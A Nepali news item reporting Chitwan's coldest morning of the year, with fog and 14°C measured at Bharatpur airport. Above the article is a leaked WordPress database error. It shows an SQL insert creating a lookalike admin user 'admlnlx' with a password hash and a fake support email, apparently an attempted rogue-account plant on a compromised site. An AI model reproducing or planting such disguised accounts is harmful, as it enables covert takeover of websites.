WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCdlixgLkCZJtlEQNSPD4ijZQ6Vl77/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-20 13:53:29', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर १९–
चितवनमा आज (आईतबार) यसवर्षकै उच्च जाडो महसुस गरिएको छ ।
विहानैदेखि शीतलहर चलेकोले चितवनमा जाडो अत्याधिक बढेको छ । आज विहान यसवर्षकै उच्च १४ डिग्री सेल्सियस तापक्रम मापन गरिएको भरतपुर विमानस्थलले जानकारी दिएको छ । आज दिउँसो २ बजेसम्मको तापक्रम भने १९ डिग्री सेल्सियस रहेको छ ।केही दिन यता विहान र बेलुका जाडो भएपनि दिउँसो भने चर्को घाम लाग्ने गरेको थियो । तर आज विहानैदेखि कुहिरो लागेको छ ।
चितवनबासी बाक्लो कपडा लगाएर हिड्नुपर्ने बेला आएको छ ।